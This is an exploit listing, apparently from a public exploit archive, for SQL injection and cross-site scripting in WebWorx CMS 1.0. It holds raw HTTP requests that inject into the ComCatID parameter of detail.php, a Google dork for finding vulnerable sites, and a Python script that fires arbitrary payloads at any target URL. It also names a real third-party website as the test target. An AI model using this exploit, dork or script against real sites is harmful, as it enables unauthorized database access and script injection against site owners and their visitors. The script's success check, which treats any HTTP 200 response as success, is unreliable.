Exploit for Webworx CMS 1.0 SQL Injection / Cross Site Scripting

Name: Exploit for Webworx CMS 1.0 SQL Injection / Cross Site Scripting
Rating: 5 (38 reviews)
2025-03-27 | CVSS 7.9
## https://sploitus.com/exploit?id=PACKETSTORM:190069
# Exploit Title: WebWorx CMS - SQL Injection & Cross-Site Scripting (XSS) Vulnerabilities
    # Date: 2025-03-25
    # Exploit Author: wa0_3/@td9_l
    # Telegram: @wa0_3
    # Vendor Homepage: https://webworx.technology/
    # Version: 1.0
    # Tested on: http://www.native.edu.pk
    # Category: WebApps
    # CVE: N/A
    
    
    ## Vulnerable Endpoint:
    ```
    SQLI
    
    GET /detail.php?ComCatID=26' HTTP/1.1
    Host: localhost
    Accept-Encoding: gzip, deflate, br
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128", "Chromium";v="128"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 0
    
    ```
    XSS
    GET /detail.php?ComCatID=25 HTTP/1.1
    Host:localhost
    Accept-Encoding: gzip, deflate, br
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128", "Chromium";v="128"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 0
    
    
    ## Google Dork:
    ```
    intxt:  Developed by Webworx Technologies
    ```
    inurl:detail.php?ComCatID=
    ```
    ## Proof of Concept (PoC):
    ```import argparse
    import requests
    
    parser = argparse.ArgumentParser(description='Exploit SQLi & XSS in WebWorx CMS')
    parser.add_argument('-url', help='Target URL (e.g., http://example.com)', required=True)
    parser.add_argument('-payload', help='SQLi or XSS payload', required=True)
    args = parser.parse_args()
    
    url = f"{args.url}/detail.php?ComCatID={args.payload}"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate, br",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "keep-alive"
    }
    
    response = requests.get(url, headers=headers)
    
    if response.status_code == 200:
        print("[+] Exploit Successful!")
        print("[+] Response:")
        print(response.text)
    else:
        print("[-] Exploit Failed")
    ```
    
    ## Credits:
    Discovered by **wa0_3** (@wa0_3)